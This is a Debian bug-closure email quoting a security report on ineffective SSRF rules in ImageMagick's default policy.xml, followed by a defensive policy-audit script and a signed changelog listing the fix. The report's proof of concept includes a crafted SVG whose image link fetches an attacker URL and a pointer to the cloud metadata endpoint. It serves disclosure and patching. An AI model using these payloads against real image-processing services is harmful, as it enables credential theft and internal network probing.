Your message dated Wed, 24 Jun 2026 21:02:59 +0000
with message-id <[email protected]>
and subject line Bug#1140176: fixed in imagemagick 8:6.9.11.60+dfsg-1.6+deb12u11
has caused the Debian Bug report #1140176,
regarding imagemagick: default policy.xml HTTP/HTTPS/URL delegate rules are
no-ops (SSRF, CWE-918)
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)
--
1140176: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1140176
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: imagemagick
Version: 8:7.1.2.15+dfsg1-2
Severity: grave
Tags: security patch
Dear Maintainer,
The default ImageMagick security policy shipped by Debian in
debian/patches/0005-Add-a-debian-policy.patch
(installed as /etc/ImageMagick-7/policy.xml) attempts to block remote
HTTP/HTTPS/URL access -- the standard SSRF mitigation -- with these rules:
<policy domain="delegate" rights="none" pattern="URL" />
<policy domain="delegate" rights="none" pattern="HTTPS" />
<policy domain="delegate" rights="none" pattern="HTTP" />
These rules are silently ineffective, so a default install still performs
outbound HTTP/HTTPS requests and is vulnerable to SSRF (CWE-918).
Root cause
----------
The http:/https: coders fetch URLs by invoking delegates named
"http:decode" / "https:decode" (coders/url.c). InvokeDelegate()
(MagickCore/delegate.c) enforces the "delegate" policy by glob-matching
the policy pattern against that full identifier string. The pattern
"HTTP" (no wildcards) does not match the literal string "http:decode",
so the rule is treated as inapplicable and the default (allow) wins.
The patterns "HTTP", "HTTPS" and "URL" therefore never block the URL
coders.
The "@*" path rule in the same file is enforced through a different code
path and does work, which gives operators false confidence that the
HTTP/HTTPS/URL restriction is also working.
Proof of concept
----------------
All commands run against the unmodified, as-installed policy.xml.
1. Minimal listener:
python3 -c 'import http.server,socketserver
class H(http.server.BaseHTTPRequestHandler):
    def do_GET(s): print("SSRF:",s.path); s.send_response(200); s.end_headers(); s.wfile.write(b"GIF89a;")
    def log_message(s,*a): pass
socketserver.TCPServer(("127.0.0.1",7777),H).serve_forever()'
2. Confirm the restrictive policy is active (this is correctly blocked):
echo x > /tmp/q.txt
magick label:@/tmp/q.txt /tmp/q.png
-> magick: attempt to perform an operation not allowed by the
security policy `@/tmp/q.txt'
3. PoC 1 -- direct URL coder:
magick http://127.0.0.1:7777/ssrf out.png
-> listener logs: SSRF: /ssrf
4. PoC 2 -- SSRF via untrusted SVG (the realistic web-service vector):
printf '<svg xmlns:xlink="http://www.w3.org/1999/xlink" width="10"
height="10"><image xlink:href="http://127.0.0.1:7777/svg-ssrf" width="10"
height="10"/></svg>' > evil.svg
magick evil.svg out.png
-> listener logs: SSRF: /svg-ssrf
Both requests are sent despite the delegate rights="none" rules.
Substituting a real internal target (e.g.
http://169.254.169.254/latest/meta-data/) demonstrates real impact.
Impact
------
A service that thumbnails or converts user-supplied SVG (or URL) input
with ImageMagick can be coerced into attacker-controlled server-side
requests to internal services or cloud metadata endpoints, enabling
credential theft and internal port/host scanning. The exposure is worse
because operators believe they are protected: they deployed a policy
that explicitly lists HTTP, HTTPS and URL as forbidden.
Suggested fix
-------------
Replace the ineffective delegate rules with the coder-domain form, which
is enforced and covers every remote scheme:
<policy domain="coder" rights="none" pattern="{HTTP,HTTPS,FTP,FTPS,URL,MSL,MVG}" />
(keeping the existing @* path rule). Verify with:
magick http://127.0.0.1:1/x x.png
which must be rejected by policy, not merely fail to connect.
Bastien Roucariès has already prepared a fix; a CVE request is in
progress. I am filing here at the request of the Debian Security Team so
the fix is tracked in the BTS.
Tested on imagemagick 8:7.1.2.15+dfsg1-2; applies generally to the
ImageMagick 7.x series.
Regards,
Maram Sai Harsha Vardhan Reddy
Security Researcher
[email protected]
--- End Message ---
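The following is an added audit script, not part of the bug report above and not ImageMagick's own code. It models the matching the report describes: a "delegate" policy pattern is glob-matched against the full delegate identifier ("http:decode", "https:decode"), so a pattern such as "HTTP" with no wildcard matches nothing and the rule is a silent no-op, while the "@*" path rule and the suggested coder-domain form do match. Assumptions not taken from the report: the list of known delegate identifiers is only the two the report names, the "coder" domain is modelled as matching the coder name (e.g. "HTTP"), matching is treated as case-sensitive, and Python's fnmatch plus a small brace expander stands in for ImageMagick's GlobExpression. Operators can point ineffective_delegate_rules() at their own policy.xml to find rules that never match any known delegate.

```python
"""Audit an ImageMagick policy.xml for delegate rules that can never match.

Added example (not from the Debian bug report or from ImageMagick). Delegate
rules are matched against full delegate identifiers as the report describes;
coder-domain matching against the coder name and case-sensitive matching are
assumptions made here.
"""
import fnmatch
import re
import xml.etree.ElementTree as ET

# Constructed sample: the three shipped delegate rules plus the path rule
# the report says is enforced through a different code path.
SHIPPED_POLICY = """<policymap>
  <policy domain="delegate" rights="none" pattern="URL" />
  <policy domain="delegate" rights="none" pattern="HTTPS" />
  <policy domain="delegate" rights="none" pattern="HTTP" />
  <policy domain="path" rights="none" pattern="@*" />
</policymap>"""

# Constructed sample: the coder-domain form the report suggests instead.
FIXED_POLICY = """<policymap>
  <policy domain="coder" rights="none" pattern="{HTTP,HTTPS,FTP,FTPS,URL,MSL,MVG}" />
  <policy domain="path" rights="none" pattern="@*" />
</policymap>"""

# Delegate identifiers named in the report (coders/url.c). Assumed to be the
# only ones relevant here; extend this list for a fuller audit.
KNOWN_DELEGATES = ["http:decode", "https:decode"]


def expand_braces(pattern):
    """Expand {a,b,c} alternation (recursively) into a list of plain globs."""
    m = re.search(r"\{([^{}]*)\}", pattern)
    if m is None:
        return [pattern]
    head, tail = pattern[:m.start()], pattern[m.end():]
    out = []
    for alt in m.group(1).split(","):
        out.extend(expand_braces(head + alt + tail))
    return out


def glob_match(pattern, name):
    """Glob match supporting '*', '?' and '{a,b}'; case-sensitive (assumption)."""
    return any(fnmatch.fnmatchcase(name, p) for p in expand_braces(pattern))


def load_rules(policy_xml):
    """Return (domain, granted-rights set, pattern) triples from a policy document."""
    rules = []
    for el in ET.fromstring(policy_xml).iter("policy"):
        rights = el.get("rights", "").strip().lower()
        granted = set() if rights == "none" else {r.strip() for r in rights.split("|")}
        rules.append((el.get("domain"), granted, el.get("pattern", "")))
    return rules


def is_allowed(policy_xml, domain, name, right):
    """Default allow; any matching rule in the domain that lacks `right` denies.

    A rule whose pattern matches nothing never reaches the deny branch, which
    is exactly how the shipped HTTP/HTTPS/URL rules become no-ops.
    """
    for dom, granted, pattern in load_rules(policy_xml):
        if dom == domain and glob_match(pattern, name) and right not in granted:
            return False
    return True


def ineffective_delegate_rules(policy_xml, known_delegates=KNOWN_DELEGATES):
    """Patterns of delegate rules that match none of the known delegate identifiers."""
    return [pattern for dom, _, pattern in load_rules(policy_xml)
            if dom == "delegate"
            and not any(glob_match(pattern, d) for d in known_delegates)]


if __name__ == "__main__":
    print("no-op delegate rules:", ineffective_delegate_rules(SHIPPED_POLICY))
    print("http:decode allowed under shipped policy:",
          is_allowed(SHIPPED_POLICY, "delegate", "http:decode", "execute"))
    print("HTTP coder allowed under suggested policy:",
          is_allowed(FIXED_POLICY, "coder", "HTTP", "read"))
```

Running the script reports all three shipped delegate patterns as no-ops and shows "http:decode" still permitted under that policy, while the same path rule denies "@/tmp/q.txt" and the coder-domain pattern denies the HTTP coder, matching the behaviour the report observes with the real binary.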
--- Begin Message ---
Source: imagemagick
Source-Version: 8:6.9.11.60+dfsg-1.6+deb12u11
Done: Bastien Roucariès <[email protected]>
We believe that the bug you reported is fixed in the latest version of
imagemagick, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Bastien Roucariès <[email protected]> (supplier of updated imagemagick package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Format: 1.8
Date: Sun, 21 Jun 2026 15:40:05 +0200
Source: imagemagick
Architecture: source
Version: 8:6.9.11.60+dfsg-1.6+deb12u11
Distribution: bookworm-security
Urgency: high
Maintainer: ImageMagick Packaging Team
<[email protected]>
Changed-By: Bastien Roucariès <[email protected]>
Closes: 1140176
Changes:
imagemagick (8:6.9.11.60+dfsg-1.6+deb12u11) bookworm-security; urgency=high
.
* Fix CVE-2026-48733:
An infinite loop in the subimage-search operation can happen
when using a crafted image.
* Fix CVE-2026-48734:
A crafted MVG file could result in a stack overflow due to a missing depth
or visited-set check.
* Fix CVE-2026-48994:
A missing check of a return value could lead to a heap buffer over-write
in the MAT decoder on 32-bit systems.
* Fix CVE-2026-49218:
A missing check in the DCM decoder could result in an image with invalid
dimensions, and that could cause crashes in other operations.
* Fix CVE-2026-53460:
A missing check for maximum memory request in AcquireAlignedMemory
could trigger an out-of-memory condition.
* Fix CVE-2026-53463:
When passing incorrect arguments in the distort operation, a
null pointer dereference will occur.
* Fix default policy.xml HTTP/HTTPS/URL delegate rules being no-ops
(Closes: #1140176)
Checksums-Sha1:
c3f16669cff11f4e0b18a0d86d3bfd20477243b3 5134
imagemagick_6.9.11.60+dfsg-1.6+deb12u11.dsc
824a63dce5e54bd8b78077d671d8ab06300a8848 9395144
imagemagick_6.9.11.60+dfsg.orig.tar.xz
3886314169eaaacb6cccab42640a3d03688f480d 337148
imagemagick_6.9.11.60+dfsg-1.6+deb12u11.debian.tar.xz
752aa4d804c3efbab1be821483cf05cda548765c 8516
imagemagick_6.9.11.60+dfsg-1.6+deb12u11_source.buildinfo
Checksums-Sha256:
bc7cfc2484b72d4791be7785a0a251c8d55508975f70d794bd14cee73d06caef 5134
imagemagick_6.9.11.60+dfsg-1.6+deb12u11.dsc
472fb516df842ee9c819ed80099c188463b9e961303511c36ae24d0eaa8959c4 9395144
imagemagick_6.9.11.60+dfsg.orig.tar.xz
7782105ca00f7a22dbc353b37b5da89414379545defce3986e0e1726631afd82 337148
imagemagick_6.9.11.60+dfsg-1.6+deb12u11.debian.tar.xz
b37363b9b3877324003befe138e26b3bddc09c2fb41e4e0969893504b0d72142 8516
imagemagick_6.9.11.60+dfsg-1.6+deb12u11_source.buildinfo
Files:
399311662b1e0251a24ec17ff9df279c 5134 graphics optional
imagemagick_6.9.11.60+dfsg-1.6+deb12u11.dsc
8b8f7b82bd1299cf30aa3c488c46a3cd 9395144 graphics optional
imagemagick_6.9.11.60+dfsg.orig.tar.xz
d36a95688c1ef54ade52609eafa870bb 337148 graphics optional
imagemagick_6.9.11.60+dfsg-1.6+deb12u11.debian.tar.xz
a3d8eeeab7895c18dcef5af365f63dc7 8516 graphics optional
imagemagick_6.9.11.60+dfsg-1.6+deb12u11_source.buildinfo
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCgAdFiEEXQGHuUCiRbrXsPVqADoaLapBCF8FAmo4HSsACgkQADoaLapB
CF+hSg/9FnxizYDr9PiDXedH+rSFGR0AgfK6JzbpmJtenlu0lGvBAqPp2OVXtMlw
4c9JYhkLXcaN9o7dbHaTRYnq6dFrlUUH6RA13oLasVG+vwG0joiCJosyPMk9TNlh
1IGU5lNNxht45+8skahfa8NBF/yhvsbJBIyoKGsf/XJRCaOfMsAlVlkbbnpjNNSX
pwgieYZh+1nQcBCJgYS3RpV5MS7E95f9mvyyU9KU/0lNuCGxGL+y9CbLfyVl6+K3
tg8lHw+lBruwB+s6h2s2XNxwjCJ8kRQdE0Vk2yuFkHx1UeBXCOa9cb9m4M1a8NJY
j6EaxAc2BemWK3HY8DbzpgvrAdRSlWZN0Ewpi00CmrTZdrYisc3R55WVzoy3y2ur
/gxOw3I/Bi2G6kcjvqGyZTjBiYJvR+4Vbvf+yAOOqIBC3hZspkWdirOsXtSQgrK9
bs2R6Sx0WOh1T0IhCl//8HfHvd9ftIHdiueFN9ombUXi/KBLyyLj6WcUojBk+O+n
FbzMOAMUJspORXx3/gGUhMiX1QfK5GocM9gWdqCnrKNUuqFHPNmxkvKsIIrDOQDm
ZiQsleURPVuAcOVQ3TnR86B8ZyLwgn9rIloNvGsRyacueBcnFbOLZ8KuJcH5ICLs
fmmO44rm/2n9Bb/UqAjBVIHjhCqFDE+h7tyXqGR+LvCC+tDwHWE=
=0a1r
-----END PGP SIGNATURE-----
--- End Message ---